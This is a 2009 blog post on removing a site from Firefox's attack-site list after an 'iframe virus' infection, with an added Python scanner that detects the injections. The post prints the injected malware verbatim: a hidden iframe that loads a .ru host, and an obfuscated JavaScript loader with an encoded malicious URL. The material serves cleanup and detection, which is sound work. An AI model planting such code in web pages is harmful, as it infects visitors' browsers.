Tuesday, September 8, 2009

How to fix "Reported Attack Site!" in Firefox caused by the iframe virus



Opening the site in IE shows no problem, but opening it in Firefox still brings up the "Reported Attack Site!" page as before.

There are 2 ways to get a domain removed from the "Reported Attack Site!" list:

Method 1:

1. Register for Google Webmaster Tools at http://www.google.com/webmasters/tools/

2. Add the affected website to your account. Google will ask you to create a blank .html file with a file name it specifies.

3. Upload that .html file (e.g. google7f37ce963aafc5ef.html) to the server's root folder, the same folder that holds index.html.

4. Confirm that the file has been uploaded. The system will check for it and, once the file is found, report what it has found wrong with the website.

5. Read the recommendations and click the link to request a review, then fill in the details and the reasons for asking Google to remove your domain from the "Reported Attack Site!" list.

Fill in something along these lines:

"I've removed all badware and fixed the vulnerability that allowed it to be placed on my site. I found some bad script includes in some files on this website and I've already removed them."

Submit and wait roughly 24-48 hours.

Method 2:

1. Request removal of the domain from the "Reported Attack Site!" list directly at
http://www.stopbadware.org/reports/container?reportname=http://www.<affected-domain>.com/ (replace <affected-domain> with the domain that was flagged)

2. Click the "Click to Request Review" button (top left, on the orange bar).

3. Fill in the details on the form.

Submit and wait roughly 24-48 hours.

The iframe virus operates in 2 ways:


1. It modifies index.php, .html and .htm files, inserting iframe code to spread the virus. Several variants have been seen; for example:


code :


<iframe src="http://a1b.ru:8080/index.php" syle="visibility: hidden" width="145" height="199"> </iframe>


It is added right after the tag or just before it.


The other variant is a long block of JavaScript spanning many lines, added after the tag.


code :


</body>
</html>
<!-- followed by several div/h3/span elements with class 'sZdI', each holding a long hex-encoded string (payload data omitted here) -->
<script>
var/*vnOQC*/vnOQC/*vnOQC*/=/*vnOQC*/document;vnOQC.writeln(vGDJP());
function/*vnOQC*/hgvcT(wtiHF){wtiHF/*vnOQC*/=/*vnOQC*/wtiHF.replace(/[\.]/g,/*vnOQC*/"%");wtiHF/*vnOQC*/=/*vnOQC*/unescape(wtiHF);return/*vnOQC*/HQZYW(wtiHF);}
function/*vnOQC*/HQZYW(vnbjD){/*vnOQC*/var/*vnOQC*/SynzJ/*vnOQC*/=/*vnOQC*/"",/*vnOQC*/gADeR/*vnOQC*/=/*vnOQC*/0;for/*vnOQC*/(gADeR=vnbjD.length-1;gADeR>=0;gADeR--){SynzJ/*vnOQC*/+=/*vnOQC*/vnbjD.charAt(gADeR);}/*vnOQC*/return/*vnOQC*/SynzJ;}
function/*vnOQC*/vGDJP(){document.write("<style>.RgAjC{width:0%;height:0%;border:none;}</style>");var/*vnOQC*/hUitZ/*vnOQC*/=/*vnOQC*/"<iframe id="\" src="%5C" class="\"></iframe>";var/*vnOQC*/ZObWX/*vnOQC*/=/*vnOQC*/hUitZ.replace(/[\+x]/g,/*vnOQC*/hgvcT(".6c.6d.74.68.2e.6e.6f.69.74.61.6d.72.6f.66.6e.69.2f.75.72.2e.74.69.67.6e.69.64.61.65.72.74.73.61.66.2f.2f.3a.70.74.74.68"));return/*vnOQC*/ZObWX;}
</script>

2. It places a file in cgi-bin to send out large volumes of spam mail, which only affects sites with CGI enabled. The file most often seen is dark.cgi.
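The following is an added example, not code from the original post: a small Python scanner that flags the two web-file injections described in item 1 (a hidden iframe tag, and the obfuscated loader whose iframe URL is a reversed, dot-separated hex string), and decodes that string the way the loader's own replace/unescape/reverse steps do. The hostnames in the sample page are constructed placeholders, not values from the post.

```python
import re
import urllib.parse

# Added example (not from the original post): scanner for the two injection
# forms: a hidden <iframe>, and the loader script that builds its iframe URL
# from a dotted-hex string ('.'->'%', unescape, then reverse the characters).

HIDDEN_IFRAME = re.compile(
    r'<iframe[^>]*(?:visibility:\s*hidden|display:\s*none|width=["\']?0%?["\']?)[^>]*>', re.I)
# Loader fingerprint: replace(/[\.]/g, "%") with optional junk comment before "%".
DOT_TO_PERCENT = re.compile(r'replace\(/\[\\\.\]/g\s*,(?:\s*/\*[^*]*\*/)?\s*"%"\)')
DOTTED_HEX = re.compile(r'"((?:\.[0-9a-fA-F]{2}){4,})"')

def decode_dotted_hex(s):
    """Undo the loader's steps: '.'->'%', percent-decode, then reverse."""
    return urllib.parse.unquote(s.replace('.', '%'))[::-1]

def encode_dotted_hex(url):
    """Inverse of decode_dotted_hex; used only to build the constructed sample."""
    return ''.join('.%02x' % b for b in url[::-1].encode())

def scan_html(text):
    """Return (kind, detail) findings for the contents of one HTML/PHP file."""
    findings = [('hidden_iframe', m.group(0)) for m in HIDDEN_IFRAME.finditer(text)]
    if DOT_TO_PERCENT.search(text) and 'unescape(' in text:
        for enc in DOTTED_HEX.findall(text):
            findings.append(('obfuscated_loader', decode_dotted_hex(enc)))
    return findings

# Constructed sample page (hypothetical hosts, not the values from the post).
SAMPLE_URL = 'http://loader.example.invalid/landing.html'
SAMPLE_PAGE = (
    '<html><body><p>site content</p>\n'
    '<iframe src="http://drop.example.invalid:8080/index.php" syle="visibility: hidden"'
    ' width="145" height="199"> </iframe>\n'
    '</body></html><div class=\'sZdI\' id=\'__1\'>3925336525336625</div>\n'
    '<script>var d=document;d.writeln(f());'
    'function h(s){s=s.replace(/[\\.]/g,/*junk*/"%");s=unescape(s);return r(s);}'
    'function r(v){var o="",i=0;for(i=v.length-1;i>=0;i--){o+=v.charAt(i);}return o;}'
    'function f(){var t="<iframe class=\\"RgAjC\\" src=\\"+x\\"></iframe>";'
    'return t.replace(/[\\+x]/g,h("' + encode_dotted_hex(SAMPLE_URL) + '"));}</script>\n')

if __name__ == '__main__':
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(kind, detail)
```

Run it over each index.php/.html/.htm file on the server; a hit on either kind means the file was modified and the entry vector still has to be closed before requesting a review.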